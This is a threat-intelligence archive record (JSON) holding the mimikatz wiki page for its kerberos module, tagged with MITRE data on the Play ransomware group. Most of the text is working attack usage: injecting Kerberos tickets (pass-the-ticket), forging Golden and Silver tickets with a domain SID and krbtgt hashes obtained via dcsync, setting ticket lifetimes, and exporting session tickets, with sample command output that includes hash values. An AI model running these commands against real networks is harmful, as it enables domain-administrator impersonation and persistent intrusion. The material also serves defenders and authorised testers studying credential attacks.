{
	"id": "90d8d229-c719-47ba-9b7a-f48e1a2383a6",
	"created_at": "2026-04-06T00:09:11.176119Z",
	"updated_at": "2026-04-10T13:12:10.142465Z",
	"deleted_at": null,
	"sha1_hash": "1a806ca2657ed5f1c7efc881064b4853f8a48830",
	"title": "module ~ kerberos",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 116961,
	"plain_text": "module ~ kerberos\r\nBy gentilkiwi\r\nArchived: 2026-04-05 22:41:26 UTC\r\nThis module can be used without any privilege. It permits to play with official Microsoft Kerberos API -\r\nhttp://msdn.microsoft.com/library/windows/desktop/aa378099.aspx - and to create offline 'Golden tickets', free,\r\nlong duration TGT tickets for any users 😄\r\nLots of informations : [fr] http://1drv.ms/1fuEU28\r\nCommands: ptt, golden / silver, list, tgt, purge\r\nptt\r\nPass-The-Ticket\r\nInjects one, or multiple, Kerberos ticket(s) in the current session ( TGT or TGS ).\r\nArguments:\r\nfilename - the ticket's filename (can be multiple)\r\ndiretory - a directory path, all .kirbi files inside will be injected.\r\nmimikatz # kerberos::ptt Administrateur@krbtgt-CHOCOLATE.LOCAL.kirbi\r\nTicket 'Administrateur@krbtgt-CHOCOLATE.LOCAL.kirbi' successfully submitted for current session\r\nRemark: if used with tickets external to mimikatz , tickets must be in Kerberos credential format ( KRB_CRED ) -\r\nhttp://tools.ietf.org/html/rfc4120#section-5.8\r\nSee also:\r\nPass-The-Hash: sekurlsa::pth\r\n[fr] http://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos\r\n[pl] http://zine.net.pl/blogs/mgrzeg/archive/2014/01/20/kerberos-a-lsass.aspx\r\n[en] http://rycon.hu/papers/goldenticket.html\r\ngolden / silver\r\nWilly Wonka's choice\r\nThis command create Kerberos ticket, a TGT or a TGS with arbitrary data, for any user you want, in groups you\r\nwant... (eg: the domain administrator 😤).\r\nhttps://github.com/gentilkiwi/mimikatz/wiki/module-~-kerberos\r\nPage 1 of 5\n\nArguments:\r\nCommon:\r\n/domain - the fully qualified domain name (eg: chocolate.local ).\r\n/sid - the SID of the domain (eg: S-1-5-21-130452501-2365100805-3685010670 ).\r\n/user - the username you want to impersonate, keep in mind that Administrator is not the only name for\r\nthis well-known account.\r\n/id - optional - the id of the user - default is: 500 for the well-known Administrator.\r\n/groups - optional - id of groups the user belongs (first is primary group, comma separator) - default is:\r\n513,512,520,518,519 for the well-known Administrator's groups.\r\nKey:\r\nKeys depend of ticket :\r\nfor a Golden, they are from the krbtgt account;\r\nfor a Silver, it comes from the \"computer account\" or \"service account\".\r\nAll of that, from NTDS.DIT , lsadump::dcsync , lsadump::lsa /inject or lsadump::lsa /patch ). You must\r\nchoose one :\r\n/rc4 or /krbtgt - the NTLM hash\r\n/aes128 - the AES128 key\r\n/aes256 - the AES256 key\r\nTarget \u0026 Service for a Silver Ticket:\r\n/target - the server/computer name where the service is hosted (ex: share.server.local ,\r\nsql.server.local:1433 , ...)\r\n/service - The service name for the ticket (ex: cifs , rpcss , http , mssql , ...)\r\nTarget Ticket:\r\n/ticket - optional - filename for output the ticket - default is: ticket.kirbi .\r\n/ptt - no output in file, just inject the golden ticket in current session.\r\nLifetime:\r\nBy default, the Golden Ticket default lifetime is 10 years, but since BlackHat \u0026 Defcon 2014 it can be configured.\r\nAll offsets are in minutes\r\n/startoffset - optional - the start offset, negative to go in past, positive to have one ticket in future\r\n/endin - optional - how long the ticket is (from start)\r\n/renewmax - optional - how long maximum, renewals included, the ticket is (from start)\r\nmimikatz # kerberos::golden /user:utilisateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-368501\r\nUser : utilisateur\r\nDomain : chocolate.local\r\nhttps://github.com/gentilkiwi/mimikatz/wiki/module-~-kerberos\r\nPage 2 of 5\n\nSID : S-1-5-21-130452501-2365100805-3685010670\r\nUser Id : 1107\r\nGroups Id : *513\r\nkrbtgt : 310b643c5316c8c3c70a10cfb17e2e31 - rc4_hmac_nt\r\nLifetime : 15/08/2014 01:57:29 ; 12/08/2024 01:57:29 ; 12/08/2024 01:57:29\r\n-\u003e Ticket : utilisateur.chocolate.kirbi\r\n * PAC generated\r\n * PAC signed\r\n * EncTicketPart generated\r\n * EncTicketPart encrypted\r\n * KrbCred generated\r\nFinal Ticket Saved to file !\r\nmimikatz # kerberos::golden /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /aes256:15540\r\nUser : Administrateur\r\nDomain : chocolate.local\r\nSID : S-1-5-21-130452501-2365100805-3685010670\r\nUser Id : 500\r\nGroups Id : *513 512 520 518 519\r\nkrbtgt : 15540cac73e94028231ef86631bc47bd5c827847ade468d6f6f739eb00c68e42 - aes256_hmac\r\nLifetime : 15/08/2014 01:46:43 ; 15/08/2014 11:46:43 ; 22/08/2014 01:46:43\r\n-\u003e Ticket : ** Pass The Ticket **\r\n * PAC generated\r\n * PAC signed\r\n * EncTicketPart generated\r\n * EncTicketPart encrypted\r\n * KrbCred generated\r\nGolden ticket for 'Administrateur @ chocolate.local' successfully submitted for current session\r\nRemarks:\r\npassword changing/smartcard usage does not invalidate Golden Ticket;\r\nthis ticket is not emitted by the real KDC, it's not related to ciphering methods allowed;\r\nNTLM hash of krbtgt account is never changed automatically.\r\nSee also:\r\nPass-The-Hash: sekurlsa::pth\r\n[en] http://www.slideshare.net/gentilkiwi/abusing-microsoft-kerberos-sorry-you-guys-dont-get-it\r\n[fr] http://blog.gentilkiwi.com/securite/mimikatz/golden-ticket-kerberos\r\n[pl] http://zine.net.pl/blogs/mgrzeg/archive/2014/01/20/kerberos-a-lsass.aspx\r\n[en] http://rycon.hu/papers/goldenticket.html\r\nhttps://github.com/gentilkiwi/mimikatz/wiki/module-~-kerberos\r\nPage 3 of 5\n\ntgt\r\nDisplays informations about the TGT of the current session.\r\nmimikatz # kerberos::tgt\r\nKerberos TGT of current session :\r\n Start/End/MaxRenew: 15/08/2014 01:46:43 ; 15/08/2014 11:46:43 ; 22/08/2014 01:46:43\r\n Service Name (02) : krbtgt ; chocolate.local ; @ chocolate.local\r\n Target Name (--) : @ chocolate.local\r\n Client Name (01) : Administrateur ; @ chocolate.local\r\n Flags 40e00000 : pre_authent ; initial ; renewable ; forwardable ;\r\n Session Key : 0x00000012 - aes256_hmac\r\n 0000000000000000000000000000000000000000000000000000000000000000\r\n Ticket : 0x00000012 - aes256_hmac ; kvno = 0 [...]\r\n ** Session key is NULL! It means allowtgtsessionkey is not set to 1 **\r\nRemark: If session key is filled with 00, then allowtgtsessionkey is not enabled -\r\nhttp://support.microsoft.com/kb/308339 - the session key will not be exported for TGT with kerberos::list\r\n/export unless you set it, it's not a problem with TGS .\r\nsekurlsa::tickets /export works without this key because it reads raw memory.\r\nlist\r\nLists and export Kerberos tickets ( TGT and TGS ) of the current session.\r\nArgument:\r\n/export - optional - export all tickets to files\r\nmimikatz # kerberos::list /export\r\n[00000000] - 12\r\n Start/End/MaxRenew: 24/04/2014 14:54:56 ; 25/04/2014 00:54:56 ; 01/05/2014 14:54:56\r\n Server Name : krbtgt/CHOCOLATE.LOCAL @ CHOCOLATE.LOCAL\r\n Client Name : Administrateur @ CHOCOLATE.LOCAL\r\n Flags 40e10000 : name_canonicalize ; pre_authent ; initial ; renewable ; forwardable ;\r\n * Saved to file : 0-40e10000-Administrateur@krbtgt~CHOCOLATE.LOCAL-CHOCOLATE.LOCAL.kirbi\r\n[00000001] - 12\r\n Start/End/MaxRenew: 24/04/2014 15:13:03 ; 25/04/2014 00:54:56 ; 01/05/2014 14:54:56\r\n Server Name : cifs/srvcharly.chocolate.local @ CHOCOLATE.LOCAL\r\n Client Name : Administrateur @ CHOCOLATE.LOCAL\r\n Flags 40a50000 : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ;\r\n * Saved to file : 1-40a50000-Administrateur@cifs~srvcharly.chocolate.local-CHOCOLATE.LOCAL.kirbi\r\nhttps://github.com/gentilkiwi/mimikatz/wiki/module-~-kerberos\r\nPage 4 of 5\n\nSee also:\r\n[fr] http://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos\r\npurge\r\nPurges all tickets of the current session.\r\nmimikatz # kerberos::purge\r\nTicket(s) purge for current session is OK\r\nSource: https://github.com/gentilkiwi/mimikatz/wiki/module-~-kerberos\r\nhttps://github.com/gentilkiwi/mimikatz/wiki/module-~-kerberos\r\nPage 5 of 5",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://github.com/gentilkiwi/mimikatz/wiki/module-~-kerberos"
	],
	"report_names": [
		"module-~-kerberos"
	],
	"threat_actors": [
		{
			"id": "75108fc1-7f6a-450e-b024-10284f3f62bb",
			"created_at": "2024-11-01T02:00:52.756877Z",
			"updated_at": "2026-04-10T02:00:05.273746Z",
			"deleted_at": null,
			"main_name": "Play",
			"aliases": null,
			"source_name": "MITRE:Play",
			"tools": [
				"Nltest",
				"AdFind",
				"PsExec",
				"Wevtutil",
				"Cobalt Strike",
				"Playcrypt",
				"Mimikatz"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434151,
	"ts_updated_at": 1775826730,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/1a806ca2657ed5f1c7efc881064b4853f8a48830.pdf",
		"text": "https://archive.orkl.eu/1a806ca2657ed5f1c7efc881064b4853f8a48830.txt",
		"img": "https://archive.orkl.eu/1a806ca2657ed5f1c7efc881064b4853f8a48830.jpg"
	}
}